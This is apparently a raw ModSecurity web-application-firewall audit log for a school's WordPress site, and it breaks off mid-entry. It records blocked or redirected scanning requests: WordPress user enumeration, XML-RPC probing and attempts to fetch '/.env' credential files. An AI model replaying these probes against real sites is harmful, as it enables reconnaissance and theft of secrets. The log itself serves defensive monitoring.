Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4828e856-Z-- --251ce073-A-- [10/May/2025:14:48:02 +0700] aB8EsquC4AqLGUOyzyUKFQAAAIk 103.236.140.4 54396 103.236.140.4 8181 --251ce073-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.82.96 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.82.96 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --251ce073-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --251ce073-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746863282614073 2566 (- - -) Stopwatch2: 1746863282614073 2566; combined=1174, p1=433, p2=708, p3=0, p4=0, p5=33, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --251ce073-Z-- --30311f2a-A-- [10/May/2025:14:48:06 +0700] aB8Etsi6w7GTj2w44Z6sdQAAANE 103.236.140.4 54496 103.236.140.4 8181 --30311f2a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.82.96 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.82.96 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --30311f2a-C-- demo.sayHello --30311f2a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --30311f2a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746863286744609 5909 (- - -) Stopwatch2: 1746863286744609 5909; combined=4830, p1=612, p2=3961, p3=43, p4=43, p5=106, sr=70, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --30311f2a-Z-- --d0f2484f-A-- [10/May/2025:14:49:58 +0700] aB8FJsi6w7GTj2w44Z6s6wAAAMQ 103.236.140.4 56748 103.236.140.4 8181 --d0f2484f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.37.37 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.37.37 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d0f2484f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d0f2484f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746863398574426 2824 (- - -) Stopwatch2: 1746863398574426 2824; combined=1287, p1=435, p2=818, p3=0, p4=0, p5=34, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d0f2484f-Z-- --badc6957-A-- [10/May/2025:14:50:01 +0700] aB8FKci6w7GTj2w44Z6s7wAAANc 103.236.140.4 56832 103.236.140.4 8181 --badc6957-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.37.37 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.37.37 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --badc6957-C-- demo.sayHello --badc6957-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --badc6957-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746863401854280 6171 (- - -) Stopwatch2: 1746863401854280 6171; combined=4380, p1=562, p2=3584, p3=42, p4=34, p5=93, sr=79, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --badc6957-Z-- --4e8d2f35-A-- [10/May/2025:14:50:28 +0700] aB8FRBLuBiaF9R054QBuJAAAABc 103.236.140.4 57368 103.236.140.4 8181 --4e8d2f35-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.88.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.88.173 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4e8d2f35-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4e8d2f35-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746863428204812 3084 (- - -) Stopwatch2: 1746863428204812 3084; combined=1403, p1=492, p2=877, p3=0, p4=0, p5=33, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4e8d2f35-Z-- --fff82d00-A-- [10/May/2025:14:50:33 +0700] aB8FSci6w7GTj2w44Z6tPwAAAMk 103.236.140.4 57468 103.236.140.4 8181 --fff82d00-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.88.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.88.173 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fff82d00-C-- demo.sayHello --fff82d00-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fff82d00-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746863433239188 6623 (- - -) Stopwatch2: 1746863433239188 6623; combined=4668, p1=577, p2=3907, p3=43, p4=35, p5=63, sr=71, sw=43, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fff82d00-Z-- --41b32850-A-- [10/May/2025:15:09:27 +0700] aB8Jt9r9PbfRBMhzxmRx7gAAAE8 103.236.140.4 53082 103.236.140.4 8181 --41b32850-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.164.5 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.164.5 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --41b32850-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --41b32850-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746864567215628 2353 (- - -) Stopwatch2: 1746864567215628 2353; combined=1323, p1=396, p2=880, p3=0, p4=0, p5=46, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --41b32850-Z-- --5747ae67-A-- [10/May/2025:15:09:32 +0700] aB8JvNr9PbfRBMhzxmRyAAAAAEU 103.236.140.4 53230 103.236.140.4 8181 --5747ae67-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.164.5 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.164.5 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5747ae67-C-- demo.sayHello --5747ae67-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5747ae67-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746864572634218 5389 (- - -) Stopwatch2: 1746864572634218 5389; combined=4223, p1=521, p2=3463, p3=35, p4=36, p5=104, sr=75, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5747ae67-Z-- --a9321b24-A-- [10/May/2025:15:21:39 +0700] aB8Mk6uC4AqLGUOyzyUVnQAAAIY 103.236.140.4 46034 103.236.140.4 8181 --a9321b24-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.222 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a9321b24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a9321b24-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746865299442424 2914 (- - -) Stopwatch2: 1746865299442424 2914; combined=1285, p1=412, p2=809, p3=0, p4=0, p5=64, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a9321b24-Z-- --495c0e6c-A-- [10/May/2025:15:21:43 +0700] aB8Ml9r9PbfRBMhzxmR5bQAAAFU 103.236.140.4 46266 103.236.140.4 8181 --495c0e6c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.222 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --495c0e6c-C-- demo.sayHello --495c0e6c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --495c0e6c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746865303596197 5528 (- - -) Stopwatch2: 1746865303596197 5528; combined=3899, p1=508, p2=3168, p3=66, p4=36, p5=72, sr=59, sw=49, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --495c0e6c-Z-- --2729a557-A-- [10/May/2025:15:25:04 +0700] aB8NYKuC4AqLGUOyzyUZaQAAAJE 103.236.140.4 57532 103.236.140.4 8181 --2729a557-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 138.197.191.87 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 138.197.191.87 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --2729a557-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2729a557-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746865504937805 700 (- - -) Stopwatch2: 1746865504937805 700; combined=289, p1=244, p2=0, p3=0, p4=0, p5=44, sr=61, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2729a557-Z-- --a2a6e413-A-- [10/May/2025:15:33:08 +0700] aB8PRKuC4AqLGUOyzyUc9AAAAJI 103.236.140.4 43152 103.236.140.4 8181 --a2a6e413-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.140 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.140 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36 Accept-Charset: utf-8 --a2a6e413-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a2a6e413-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746865988420393 875 (- - -) Stopwatch2: 1746865988420393 875; combined=378, p1=339, p2=0, p3=0, p4=0, p5=39, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a2a6e413-Z-- --0885b07a-A-- [10/May/2025:15:44:58 +0700] aB8SCtr9PbfRBMhzxmSE6wAAAEg 103.236.140.4 57982 103.236.140.4 8181 --0885b07a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.120.135.119 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.120.135.119 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0885b07a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0885b07a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746866698828316 3844 (- - -) Stopwatch2: 1746866698828316 3844; combined=1979, p1=598, p2=1347, p3=0, p4=0, p5=34, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0885b07a-Z-- --54d88d37-A-- [10/May/2025:15:54:22 +0700] aB8UPtr9PbfRBMhzxmSHwgAAAFI 103.236.140.4 41380 103.236.140.4 8181 --54d88d37-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 192.99.63.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 192.99.63.110 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --54d88d37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --54d88d37-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746867262094231 3069 (- - -) Stopwatch2: 1746867262094231 3069; combined=1348, p1=460, p2=838, p3=0, p4=0, p5=49, sr=116, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --54d88d37-Z-- --4544c874-A-- [10/May/2025:15:55:52 +0700] aB8UmBLuBiaF9R054QCNCgAAAAM 103.236.140.4 43658 103.236.140.4 8181 --4544c874-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 188.72.6.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 188.72.6.230 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4544c874-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4544c874-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746867352137175 2198 (- - -) Stopwatch2: 1746867352137175 2198; combined=1168, p1=393, p2=748, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4544c874-Z-- --2ed57c08-A-- [10/May/2025:16:13:47 +0700] aB8Yy8i6w7GTj2w44Z7R0gAAANE 103.236.140.4 37526 103.236.140.4 8181 --2ed57c08-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 117.247.169.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 117.247.169.195 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2ed57c08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2ed57c08-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746868427892436 2776 (- - -) Stopwatch2: 1746868427892436 2776; combined=1230, p1=417, p2=782, p3=0, p4=0, p5=30, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2ed57c08-Z-- --300d6459-A-- [10/May/2025:17:09:05 +0700] aB8lwauC4AqLGUOyzyUzhQAAAIg 103.236.140.4 39410 103.236.140.4 8181 --300d6459-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.60.183 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.60.183 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --300d6459-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --300d6459-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746871745922506 3404 (- - -) Stopwatch2: 1746871745922506 3404; combined=1490, p1=471, p2=982, p3=0, p4=0, p5=37, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --300d6459-Z-- --f08c8519-A-- [10/May/2025:17:09:16 +0700] aB8lzKuC4AqLGUOyzyUzlgAAAI8 103.236.140.4 39654 103.236.140.4 8181 --f08c8519-B-- POST /xmlrpc.php HTTP/1.0 Host: 